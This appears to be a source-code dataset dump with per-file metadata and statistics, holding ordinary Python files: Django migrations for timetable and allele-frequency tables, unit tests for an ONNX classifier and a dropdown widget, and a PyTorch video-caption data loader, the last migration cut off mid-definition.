] | 1
|
2022-03-03T18:58:40.000Z
|
2022-03-03T18:58:40.000Z
|
timetable/migrations/0001_initial.py
|
Toluhunter/Timetable_management
|
2f7604fb09f23a2ff376b43d34eb92ad9fc726a1
|
[
"Apache-2.0"
] | null | null | null |
timetable/migrations/0001_initial.py
|
Toluhunter/Timetable_management
|
2f7604fb09f23a2ff376b43d34eb92ad9fc726a1
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-11-25 18:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('accounts', '0008_alter_venue_name'),
]
operations = [
migrations.CreateModel(
name='CoursesWednesday',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('venue_id', models.IntegerField(blank=True, null=True)),
('class_start_time', models.TimeField(blank=True, null=True)),
('class_end_time', models.TimeField(blank=True, null=True)),
('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
],
options={
'db_table': 'courses_wednesday',
},
),
migrations.CreateModel(
name='CoursesTuesday',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('venue_id', models.IntegerField(blank=True, null=True)),
('class_start_time', models.TimeField(blank=True, null=True)),
('class_end_time', models.TimeField(blank=True, null=True)),
('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
],
options={
'db_table': 'courses_tuesday',
},
),
migrations.CreateModel(
name='CoursesThursday',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('venue_id', models.IntegerField(blank=True, null=True)),
('class_start_time', models.TimeField(blank=True, null=True)),
('class_end_time', models.TimeField(blank=True, null=True)),
('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
],
options={
'db_table': 'courses_thursday',
},
),
migrations.CreateModel(
name='CoursesMonday',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('venue_id', models.IntegerField(blank=True, null=True)),
('class_start_time', models.TimeField(blank=True, null=True)),
('class_end_time', models.TimeField(blank=True, null=True)),
('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
],
options={
'db_table': 'courses_monday',
},
),
migrations.CreateModel(
name='CoursesFriday',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('venue_id', models.IntegerField(blank=True, null=True)),
('class_start_time', models.TimeField(blank=True, null=True)),
('class_end_time', models.TimeField(blank=True, null=True)),
('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
],
options={
'db_table': 'courses_friday',
},
),
]
| 57.956522
| 170
| 0.614779
| 581
| 5,332
| 5.473322
| 0.120482
| 0.084906
| 0.102201
| 0.133648
| 0.867925
| 0.867925
| 0.867925
| 0.867925
| 0.867925
| 0.867925
| 0
| 0.004688
| 0.239872
| 5,332
| 91
| 171
| 58.593407
| 0.779916
| 0.00844
| 0
| 0.714286
| 1
| 0
| 0.167644
| 0.003974
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1df6940d7d100c2be68f1806f3ef3e5e1358783a
| 7,938
|
py
|
Python
|
_unittests/ut_sklapi/test_onnx_speedup_classifier.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 32
|
2018-03-04T23:33:30.000Z
|
2022-03-10T19:15:06.000Z
|
_unittests/ut_sklapi/test_onnx_speedup_classifier.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 184
|
2017-11-30T14:10:35.000Z
|
2022-02-21T08:29:31.000Z
|
_unittests/ut_sklapi/test_onnx_speedup_classifier.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 9
|
2019-07-24T13:18:00.000Z
|
2022-03-07T04:08:07.000Z
|
"""
@brief test log(time=5s)
"""
from io import BytesIO
import pickle
import unittest
from logging import getLogger
import numpy
from numba import NumbaWarning
# import pandas
# from sklearn.pipeline import make_pipeline
from sklearn.exceptions import ConvergenceWarning
from sklearn.linear_model import LogisticRegression
from sklearn.datasets import load_iris
from pyquickhelper.pycode import ExtTestCase, ignore_warnings
from mlprodict.sklapi import OnnxSpeedupClassifier
from mlprodict.tools import get_opset_number_from_onnx
from mlprodict.onnx_conv import to_onnx
from mlprodict.onnxrt import OnnxInference
class TestOnnxSpeedupClassifier(ExtTestCase):
def setUp(self):
logger = getLogger('skl2onnx')
logger.disabled = True
def opset(self):
return get_opset_number_from_onnx()
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier32(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset())
spd.fit(X, y)
spd.assert_almost_equal(X, decimal=5)
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier32_onnxruntime(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
runtime="onnxruntime1")
spd.fit(X, y)
spd.assert_almost_equal(X, decimal=5)
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier32_numpy(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
runtime="numpy")
spd.fit(X, y)
spd.assert_almost_equal(X, decimal=5)
@ignore_warnings((ConvergenceWarning, NumbaWarning))
def test_speedup_classifier32_numba(self):
data = load_iris()
X, y = data.data, data.target
X = X.astype(numpy.float32)
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
runtime="numba", nopython=False)
spd.fit(X, y)
spd.assert_almost_equal(X, decimal=5)
self.assertIn("CPUDispatch", str(spd.onnxrt_.func))
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier64(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X, y)
spd.assert_almost_equal(X)
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier64_op_version(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X, y)
opset = spd.op_version
self.assertGreater(self.opset(), opset[''])
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier64_pickle(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X, y)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.predict(X)
got = spd2.predict(X)
self.assertEqualArray(expected, got)
expected = spd.raw_predict(X)
got = spd2.raw_predict(X)
self.assertEqualArray(expected, got)
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier64_numpy_pickle(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False, runtime="numpy")
spd.fit(X, y)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.predict(X)
got = spd2.predict(X)
self.assertEqualArray(expected, got)
expected = spd.raw_predict(X)
got = spd2.raw_predict(X)
self.assertEqualArray(expected, got)
@ignore_warnings((ConvergenceWarning, NumbaWarning))
def test_speedup_classifier64_numba_pickle(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False, runtime="numba", nopython=False)
spd.fit(X, y)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.predict(X)
got = spd2.predict(X)
self.assertEqualArray(expected, got)
expected = spd.raw_predict(X)
got = spd2.raw_predict(X)
self.assertEqualArray(expected, got)
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier64_onnx(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X, y)
expected_label = spd.predict(X)
expected_proba = spd.predict_proba(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})
self.assertEqualArray(expected_proba, got['probabilities'])
self.assertEqualArray(expected_label, got['label'])
@ignore_warnings(ConvergenceWarning)
def test_speedup_classifier64_onnx_numpy(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False, runtime='numpy')
spd.fit(X, y)
expected_label = spd.predict(X)
expected_proba = spd.predict_proba(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})
self.assertEqualArray(expected_proba, got['probabilities'])
self.assertEqualArray(expected_label, got['label'])
@ignore_warnings((ConvergenceWarning, NumbaWarning))
def test_speedup_classifier64_onnx_numba(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False, runtime='numba', nopython=False)
spd.fit(X, y)
# print(spd.numpy_code_)
expected_label = spd.predict(X)
expected_proba = spd.predict_proba(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})
self.assertEqualArray(expected_proba, got['probabilities'])
self.assertEqualArray(expected_label, got['label'])
@ignore_warnings((ConvergenceWarning, NumbaWarning))
def test_speedup_classifier64_onnx_numba_python(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupClassifier(
LogisticRegression(), target_opset=self.opset(),
enforce_float32=False, runtime='numba', nopython=False)
spd.fit(X, y)
# print(spd.numpy_code_)
expected_label = spd.predict(X)
expected_proba = spd.predict_proba(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})
self.assertEqualArray(expected_proba, got['probabilities'])
self.assertEqualArray(expected_label, got['label'])
if __name__ == '__main__':
# TestOnnxSpeedupClassifier().test_speedup_classifier64_numba_pickle()
unittest.main()
| 35.123894
| 74
| 0.645251
| 880
| 7,938
| 5.634091
| 0.121591
| 0.010488
| 0.079064
| 0.041952
| 0.835418
| 0.818677
| 0.817668
| 0.765631
| 0.73457
| 0.73457
| 0
| 0.012408
| 0.248677
| 7,938
| 225
| 75
| 35.28
| 0.818913
| 0.025447
| 0
| 0.755208
| 0
| 0
| 0.01942
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 1
| 0.078125
| false
| 0
| 0.072917
| 0.005208
| 0.161458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e12b6ca775cc034ecc5de090637ff9de365d577
| 2,092
|
py
|
Python
|
test/dropdown_test.py
|
screamingskulls/sofi
|
1d75bc97683151864f8a4cafb59ef8e50de63ee4
|
[
"MIT"
] | 402
|
2016-04-05T23:11:07.000Z
|
2022-02-22T21:10:49.000Z
|
test/dropdown_test.py
|
screamingskulls/sofi
|
1d75bc97683151864f8a4cafb59ef8e50de63ee4
|
[
"MIT"
] | 87
|
2016-03-31T00:09:39.000Z
|
2021-02-22T04:49:25.000Z
|
test/dropdown_test.py
|
screamingskulls/sofi
|
1d75bc97683151864f8a4cafb59ef8e50de63ee4
|
[
"MIT"
] | 54
|
2016-03-31T00:10:33.000Z
|
2021-06-23T21:38:36.000Z
|
from sofi.ui import Dropdown
def test_basic():
assert(str(Dropdown("text")) == "<div class=\"dropdown\"><button class=\"btn btn-default dropdown-toggle\" type=\"button\" data-toggle=\"dropdown\">text <span class=\"caret\"></span></button><ul class=\"dropdown-menu\"></ul></div>")
def test_dropup():
assert(str(Dropdown("text", dropup=True)) == "<div class=\"dropup\"><button class=\"btn btn-default dropdown-toggle\" type=\"button\" data-toggle=\"dropdown\">text <span class=\"caret\"></span></button><ul class=\"dropdown-menu\"></ul></div>")
def test_navbaritem():
assert(str(Dropdown("text", dropup=True, navbaritem=True)) == "<li class=\"dropup\"><a class=\"dropdown-toggle\" href=\"#\" role=\"button\" data-toggle=\"dropdown\" aria-haspopup=\"true\" aria-expanded=\"false\">text <span class=\"caret\"></span></a><ul class=\"dropdown-menu\"></ul></li>")
def test_align_right():
assert(str(Dropdown("text", align='right', navbaritem=True)) == "<li class=\"dropdown\"><a class=\"dropdown-toggle\" href=\"#\" role=\"button\" data-toggle=\"dropdown\" aria-haspopup=\"true\" aria-expanded=\"false\">text <span class=\"caret\"></span></a><ul class=\"dropdown-menu dropdown-menu-right\"></ul></li>")
def test_custom_class_ident_and_style():
assert(str(Dropdown("text", cl='abclass', ident='123', style="font-size:0.9em;"))
== "<div id=\"123-dropdown\" class=\"dropdown abclass\" style=\"font-size:0.9em;\"><button id=\"123\" class=\"btn btn-default dropdown-toggle\" type=\"button\" data-toggle=\"dropdown\">text <span class=\"caret\"></span></button><ul class=\"dropdown-menu\"></ul></div>")
def test_navbaritem_custom_class_ident_and_style():
assert(str(Dropdown("text", navbaritem=True, cl='abclass', ident='123', style="font-size:0.9em;"))
== "<li id=\"123-dropdown\" class=\"dropdown abclass\" style=\"font-size:0.9em;\"><a id=\"123\" class=\"dropdown-toggle\" href=\"#\" role=\"button\" data-toggle=\"dropdown\" aria-haspopup=\"true\" aria-expanded=\"false\">text <span class=\"caret\"></span></a><ul class=\"dropdown-menu\"></ul></li>")
| 95.090909
| 318
| 0.656788
| 286
| 2,092
| 4.748252
| 0.167832
| 0.124448
| 0.07511
| 0.092784
| 0.807806
| 0.807806
| 0.76215
| 0.76215
| 0.76215
| 0.645803
| 0
| 0.013485
| 0.078394
| 2,092
| 21
| 319
| 99.619048
| 0.690871
| 0
| 0
| 0
| 0
| 0
| 0.404398
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| true
| 0
| 0.066667
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
385466d0b2fcca93f4d063c912058a4826d800e5
| 337
|
py
|
Python
|
src/openbiolink/graph_creation/file_processor/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 97
|
2019-11-26T09:53:18.000Z
|
2022-03-19T10:33:10.000Z
|
src/openbiolink/graph_creation/file_processor/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 67
|
2019-12-09T21:01:52.000Z
|
2021-12-21T15:19:41.000Z
|
src/openbiolink/graph_creation/file_processor/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 20
|
2020-01-13T23:02:25.000Z
|
2022-03-16T21:43:31.000Z
|
from openbiolink.graph_creation.file_processor.edge import *
from openbiolink.graph_creation.file_processor.fileProcessor import FileProcessor
from openbiolink.graph_creation.file_processor.mapping import *
from openbiolink.graph_creation.file_processor.onto import *
from openbiolink.graph_creation.file_processor.onto_mapping import *
| 56.166667
| 81
| 0.884273
| 42
| 337
| 6.833333
| 0.261905
| 0.261324
| 0.348432
| 0.487805
| 0.804878
| 0.804878
| 0.519164
| 0.355401
| 0
| 0
| 0
| 0
| 0.059347
| 337
| 5
| 82
| 67.4
| 0.905363
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
38b34cea4d5e93b4c41a18a53f150488ced74138
| 9,113
|
py
|
Python
|
dataloader.py
|
stillarrow/S2VT_ACT
|
1a0fbf93f36492696e8c044ad1816d276747e26a
|
[
"MIT"
] | 3
|
2020-12-14T18:24:45.000Z
|
2021-11-12T23:02:15.000Z
|
dataloader.py
|
stillarrow/S2VT_ACT
|
1a0fbf93f36492696e8c044ad1816d276747e26a
|
[
"MIT"
] | null | null | null |
dataloader.py
|
stillarrow/S2VT_ACT
|
1a0fbf93f36492696e8c044ad1816d276747e26a
|
[
"MIT"
] | 1
|
2020-12-17T23:10:57.000Z
|
2020-12-17T23:10:57.000Z
|
import json
import random
import os
import numpy as np
import torch
from torch.utils.data import Dataset
class VideoDataset(Dataset):
def get_vocab_size(self):
return len(self.get_vocab())
def get_vocab(self):
return self.ix_to_word
def get_seq_length(self):
return self.seq_length
def __init__(self, opt, mode):
super(VideoDataset, self).__init__()
self.mode = mode # to load train/validate/test data
# load the json file which contains information about the dataset
self.captions = json.load(open(opt["caption_json"]))
info = json.load(open(opt["info_json"]))
self.ix_to_word = info['ix_to_word']
self.word_to_ix = info['word_to_ix']
print('vocab size is ', len(self.ix_to_word))
self.splits = info['videos']
print('number of train videos: ', len(self.splits['train']))
print('number of validate videos: ', len(self.splits['validate']))
print('number of test videos: ', len(self.splits['test']))
self.feats_dir = opt["feats_dir"]
self.c3d_feats_dir = opt['c3d_feats_dir']
self.with_c3d = opt['with_c3d']
print('load feats from %s' % (self.feats_dir))
# load in the sequence data
self.max_len = opt["max_len"]
print('max sequence length in data is', self.max_len)
def __getitem__(self, ix):
"""This function returns a tuple that is further passed to collate_fn
"""
# which part of data to load
if self.mode == 'validate':
ix += len(self.splits['train'])
elif self.mode == 'test':
ix = ix + len(self.splits['train']) + len(self.splits['validate'])
fc_feat = []
for dir in self.feats_dir:
fc_feat.append(np.load(os.path.join(dir, 'video%i.npy' % (ix))))
fc_feat = np.concatenate(fc_feat, axis=1)
if self.with_c3d == 1:
c3d_feat = np.load(os.path.join(self.c3d_feats_dir, 'video%i.npy'%(ix)))
c3d_feat = np.mean(c3d_feat, axis=0, keepdims=True)
fc_feat = np.concatenate((fc_feat, np.tile(c3d_feat, (fc_feat.shape[0], 1))), axis=1)
label = np.zeros(self.max_len)
mask = np.zeros(self.max_len)
captions = self.captions['video%i'%(ix)]['final_captions']
# Add <PAD>
gts = np.zeros((len(captions), self.max_len))
for i, cap in enumerate(captions):
if len(cap) > self.max_len:
cap = cap[:self.max_len]
cap[-1] = '<EOS>'
for j, w in enumerate(cap):
gts[i, j] = self.word_to_ix[w]
# random select a caption for this video
cap_ix = random.randint(0, len(captions) - 1)
label = gts[cap_ix]
# Mask is used to mask <EOS> and <PAD>. <EOS>=1 and <PAD>=0
non_zero = (label <= 1).nonzero()
try:
mask[:int(non_zero[0][0]) + 1] = 1
except:
print('non_zero:{}'.format(non_zero))
print('captions:{}'.format(captions))
print('gts:{}'.format(gts))
print('label:{}'.format(label))
raise ValueError
data = {}
data['fc_feats'] = torch.from_numpy(fc_feat).type(torch.FloatTensor)
data['labels'] = torch.from_numpy(label).type(torch.LongTensor)
data['masks'] = torch.from_numpy(mask).type(torch.FloatTensor)
data['gts'] = torch.from_numpy(gts).long()
data['video_ids'] = 'video%i' % (ix)
return data
def __len__(self):
return len(self.splits[self.mode])
class VideoActDataset(Dataset):
def get_vocab_size(self):
return len(self.get_vocab())
def get_vocab(self):
return self.ix_to_word
def get_seq_length(self):
return self.seq_length
def __init__(self, opt, mode):
super(VideoActDataset, self).__init__()
self.mode = mode # to load train/validate/test data
# load the action
self.action_set = {}
with open('./data/actions_short.txt', 'rt') as f:
for line in f:
if len(line) > 2:
line_data = line.strip().split(': ')
self.action_set[line_data[0]] = line_data[1]
self.action_numbers = len(self.action_set)
# load the json file which contains information about the dataset
self.captions = json.load(open(opt["caption_json"]))
info = json.load(open(opt["info_json"]))
self.ix_to_word = info['ix_to_word']
self.word_to_ix = info['word_to_ix']
print('vocab size is ', len(self.ix_to_word))
self.splits = info['videos']
print('number of train videos: ', len(self.splits['train']))
print('number of validate videos: ', len(self.splits['validate']))
print('number of test videos: ', len(self.splits['test']))
self.feats_dir = opt["feats_dir"]
self.c3d_feats_dir = opt['c3d_feats_dir']
self.with_c3d = opt['with_c3d']
print('load feats from %s' % (self.feats_dir))
# load in the sequence data
self.max_len = opt["max_len"]
print('max sequence length in data is', self.max_len)
def __getitem__(self, ix):
"""This function returns a tuple that is further passed to collate_fn
# Update 1 #
instead of only return the max_len's text one-hot data, also return a action text (if there isn't, return <PAD>).
"""
# which part of data to load
if self.mode == 'validate':
ix += len(self.splits['train'])
elif self.mode == 'test':
ix = ix + len(self.splits['train']) + len(self.splits['validate'])
fc_feat = []
for dir in self.feats_dir:
fc_feat.append(np.load(os.path.join(dir, 'video%i.npy' % (ix))))
fc_feat = np.concatenate(fc_feat, axis=1)
if self.with_c3d == 1:
c3d_feat = np.load(os.path.join(self.c3d_feats_dir, 'video%i.npy' % (ix)))
c3d_feat = np.mean(c3d_feat, axis=0, keepdims=True)
fc_feat = np.concatenate((fc_feat, np.tile(c3d_feat, (fc_feat.shape[0], 1))), axis=1)
label = np.zeros(self.max_len)
mask = np.zeros(self.max_len)
captions = self.captions['video%i' % (ix)]['final_captions']
raw_captions = self.captions['video%i' % (ix)]['captions']
# Add <PAD>
gts = np.zeros((len(captions), self.max_len))
for i, cap in enumerate(captions):
if len(cap) > self.max_len:
cap = cap[:self.max_len]
cap[-1] = '<EOS>'
for j, w in enumerate(cap):
gts[i, j] = self.word_to_ix[w]
# random select a caption for this video
cap_ix = random.randint(0, len(captions) - 1)
label = gts[cap_ix]
# Select Actions
cnt_actions_in_select_cap = {} # This count the frequency of actions for the cap_ix caption
cnt_actions_in_all_cap = {}
select_act = '<PAD>' # Default set to be <PAD>
for key in self.action_set.keys():
cnt_actions_in_select_cap[key] = 0
cnt_actions_in_all_cap[key] = 0
for key in self.action_set.keys():
if self.action_set[key] in cap:
cnt_actions_in_select_cap[key] += 1
action_freq_select = list(cnt_actions_in_select_cap.values())
if sum(action_freq_select) > 0:
# randomly return an action appears in this selected caption
act_select_idx = np.random.choice(
self.action_numbers, 1, p=np.array(action_freq_select)/sum(action_freq_select))
select_act = list(self.action_set.values())[act_select_idx[0]]
else:
for cap in raw_captions:
for key in self.action_set.keys():
if self.action_set[key] in cap:
cnt_actions_in_all_cap[key] += 1
action_freq_all = list(cnt_actions_in_all_cap.values())
if sum(action_freq_all) > 0:
act_select_idx = np.random.choice(self.action_numbers, 1, p=np.array(action_freq_all)/sum(action_freq_all))
select_act = list(self.action_set.values())[act_select_idx[0]]
if select_act in self.word_to_ix.keys():
select_act_token = self.word_to_ix[select_act]
else:
select_act_token = self.word_to_ix['<PAD>']
# Mask is used to mask <EOS> and <PAD>. <EOS>=1 and <PAD>=0
non_zero = (label <= 1).nonzero()
mask[:int(non_zero[0][0]) + 1] = 1
data = {}
data['fc_feats'] = torch.from_numpy(fc_feat).type(torch.FloatTensor)
data['labels'] = torch.from_numpy(label).type(torch.LongTensor)
data['masks'] = torch.from_numpy(mask).type(torch.FloatTensor)
data['gts'] = torch.from_numpy(gts).long()
data['video_ids'] = 'video%i' % (ix)
data['action'] = torch.tensor(select_act_token).type(torch.LongTensor)
return data
def __len__(self):
return len(self.splits[self.mode])
| 39.969298
| 125
| 0.586415
| 1,283
| 9,113
| 3.95947
| 0.132502
| 0.028937
| 0.035827
| 0.016535
| 0.832283
| 0.81378
| 0.785827
| 0.770669
| 0.763583
| 0.763583
| 0
| 0.010063
| 0.280259
| 9,113
| 227
| 126
| 40.145374
| 0.764446
| 0.105015
| 0
| 0.74269
| 0
| 0
| 0.098962
| 0.002965
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070175
| false
| 0
| 0.035088
| 0.046784
| 0.175439
| 0.093567
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38d4e091dfb8c220d9bb89331ed51e2a087606a2
| 13,974
|
py
|
Python
|
frequencies/migrations/0001_initial.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 14
|
2019-09-30T12:44:17.000Z
|
2022-02-04T14:45:16.000Z
|
frequencies/migrations/0001_initial.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 244
|
2021-03-26T15:13:15.000Z
|
2022-03-31T15:48:04.000Z
|
frequencies/migrations/0001_initial.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 8
|
2020-05-19T21:55:13.000Z
|
2022-03-31T07:02:58.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-19 10:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Exac",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("release", models.CharField(max_length=32)),
("chromosome", models.CharField(max_length=32)),
("position", models.IntegerField()),
("reference", models.CharField(max_length=512)),
("alternative", models.CharField(max_length=512)),
("ac", models.IntegerField(null=True)),
("ac_afr", models.IntegerField(null=True)),
("ac_amr", models.IntegerField(null=True)),
("ac_eas", models.IntegerField(null=True)),
("ac_fin", models.IntegerField(null=True)),
("ac_nfe", models.IntegerField(null=True)),
("ac_oth", models.IntegerField(null=True)),
("ac_sas", models.IntegerField(null=True)),
("an", models.IntegerField(null=True)),
("an_afr", models.IntegerField(null=True)),
("an_amr", models.IntegerField(null=True)),
("an_eas", models.IntegerField(null=True)),
("an_fin", models.IntegerField(null=True)),
("an_nfe", models.IntegerField(null=True)),
("an_oth", models.IntegerField(null=True)),
("an_sas", models.IntegerField(null=True)),
("hemi", models.IntegerField(null=True)),
("hemi_afr", models.IntegerField(null=True)),
("hemi_amr", models.IntegerField(null=True)),
("hemi_eas", models.IntegerField(null=True)),
("hemi_fin", models.IntegerField(null=True)),
("hemi_nfe", models.IntegerField(null=True)),
("hemi_oth", models.IntegerField(null=True)),
("hemi_sas", models.IntegerField(null=True)),
("hom", models.IntegerField(null=True)),
("hom_afr", models.IntegerField(null=True)),
("hom_amr", models.IntegerField(null=True)),
("hom_eas", models.IntegerField(null=True)),
("hom_fin", models.IntegerField(null=True)),
("hom_nfe", models.IntegerField(null=True)),
("hom_oth", models.IntegerField(null=True)),
("hom_sas", models.IntegerField(null=True)),
("popmax", models.CharField(max_length=8, null=True)),
("ac_popmax", models.IntegerField(null=True)),
("an_popmax", models.IntegerField(null=True)),
("af_popmax", models.FloatField(null=True)),
("hemi_popmax", models.IntegerField(null=True)),
("hom_popmax", models.IntegerField(null=True)),
("af", models.FloatField(null=True)),
("af_afr", models.FloatField(null=True)),
("af_amr", models.FloatField(null=True)),
("af_eas", models.FloatField(null=True)),
("af_fin", models.FloatField(null=True)),
("af_nfe", models.FloatField(null=True)),
("af_oth", models.FloatField(null=True)),
("af_sas", models.FloatField(null=True)),
],
),
migrations.CreateModel(
name="GnomadExomes",
fields=[
(
"id",
models.AutoField(
